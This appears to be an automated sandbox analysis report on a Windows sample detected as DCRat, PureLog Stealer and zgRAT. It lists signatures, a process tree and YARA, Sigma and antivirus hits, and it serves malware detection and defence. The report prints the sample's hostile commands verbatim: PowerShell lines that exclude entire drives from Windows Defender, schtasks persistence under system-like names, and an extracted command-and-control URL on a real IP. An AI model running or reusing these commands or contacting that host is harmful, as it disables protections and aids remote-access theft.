Windows Analysis Report
3XtEci4Mmo.exe

Overview

General Information

Sample name: 3XtEci4Mmo.exe
renamed because original name is a hash value
Original sample name: 529b29e8bcef9cc790f7c61f40d44b39.exe
Analysis ID: 1586105
MD5: 529b29e8bcef9cc790f7c61f40d44b39
SHA1: 094a6c81f7a116d2099790de3e7cd6449f1bb834
SHA256: a9249873d68391dcdd604b5332c1f3ee1be4303ff5ba8e83147fbab20f87de88
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3XtEci4Mmo.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\3XtEci4Mmo.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
    • powershell.exe (PID: 6100 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5932 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6860 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8052 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8076 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8164 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 9 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8088 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8208 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8264 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8292 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8312 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8332 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8388 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8460 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8476 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8496 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8516 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • WmiPrvSE.exe (PID: 8776 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 2000 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1188 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5724 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6256 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3168 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7192 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7208 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7224 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8580 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 8724 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • TezdDRgSgyeGDKRkzk.exe (PID: 8300 cmdline: "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
  • conhost.exe (PID: 8228 cmdline: C:\Recovery\conhost.exe MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
  • TezdDRgSgyeGDKRkzk.exe (PID: 8416 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
  • TezdDRgSgyeGDKRkzk.exe (PID: 8432 cmdline: "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
    • cmd.exe (PID: 8424 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • TezdDRgSgyeGDKRkzk.exe (PID: 8496 cmdline: "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
        • powershell.exe (PID: 5644 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3236 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8084 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3544 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9204 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8728 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1712 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7044 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6476 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8580 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8096 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • conhost.exe (PID: 8652 cmdline: "C:\Program Files\Google\Chrome\Application\conhost.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
  • svchost.exe (PID: 6796 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Malware Configuration

{"C2 url": "http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author
3XtEci4Mmo.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
3XtEci4Mmo.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author
C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files\Google\Chrome\Application\conhost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
Source | Rule | Description | Author
00000000.00000000.1677214516.0000000000052000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: 3XtEci4Mmo.exe PID: 5444 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author
0.0.3XtEci4Mmo.exe.50000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.0.3XtEci4Mmo.exe.50000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\3XtEci4Mmo.exe, ProcessId: 5444, TargetFilename: C:\Recovery\conhost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f, CommandLine: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 180, ParentProcessName: powershell.exe, ProcessCommandLine: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f, ProcessId: 8052, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3XtEci4Mmo.exe", ParentImage: C:\Users\user\Desktop\3XtEci4Mmo.exe, ParentProcessId: 5444, ParentProcessName: 3XtEci4Mmo.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6100, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: C:\Recovery\conhost.exe, CommandLine: C:\Recovery\conhost.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\conhost.exe, NewProcessName: C:\Recovery\conhost.exe, OriginalFileName: C:\Recovery\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\conhost.exe, ProcessId: 8228, ProcessName: conhost.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3XtEci4Mmo.exe", ParentImage: C:\Users\user\Desktop\3XtEci4Mmo.exe, ParentProcessId: 5444, ParentProcessName: 3XtEci4Mmo.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6100, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3XtEci4Mmo.exe", ParentImage: C:\Users\user\Desktop\3XtEci4Mmo.exe, ParentProcessId: 5444, ParentProcessName: 3XtEci4Mmo.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6100, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6796, ProcessName: svchost.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 180, ParentProcessName: powershell.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f, ProcessId: 8088, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T18:08:35.783039+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49955 | 185.177.239.66 | 80 | TCP

AV Detection

Source: 3XtEci4Mmo.exe; Avira: detected
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Google\Chrome\Application\conhost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Google\Chrome\Application\conhost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: DCRat {"C2 url": "http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe; ReversingLabs: Detection: 71%
Source: C:\Program Files\Google\Chrome\Application\conhost.exe; ReversingLabs: Detection: 71%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe; ReversingLabs: Detection: 71%
Source: C:\Recovery\conhost.exe; ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\BargBgFj.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\EVQZcBiW.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\FAtHPtxq.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\FizIvULx.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\HDgqkcCm.log; ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\HTUGeMKX.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\IrkyWqxk.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\LCxGrujI.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\MgnHXjFm.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\OlTNIjCM.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\QImfPxDF.log; ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\QNGyvuni.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\QXRfkjyW.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\SDpvGwhv.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\UXWdwFYk.log; ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\WgiUHyMw.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\XQlMiBJi.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\Zallyypm.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\ZrGvzZJn.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\dVnCFeff.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\exStwvKV.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\fSOKaeua.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\kOdTVPKT.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\mHfKTHWS.log; ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\pHCSiMBb.log; ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\pKSShysD.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\pyJigHPD.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\qwPLRqWX.log; ReversingLabs: Detection: 29%
Source: 3XtEci4Mmo.exe; ReversingLabs: Detection: 71%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
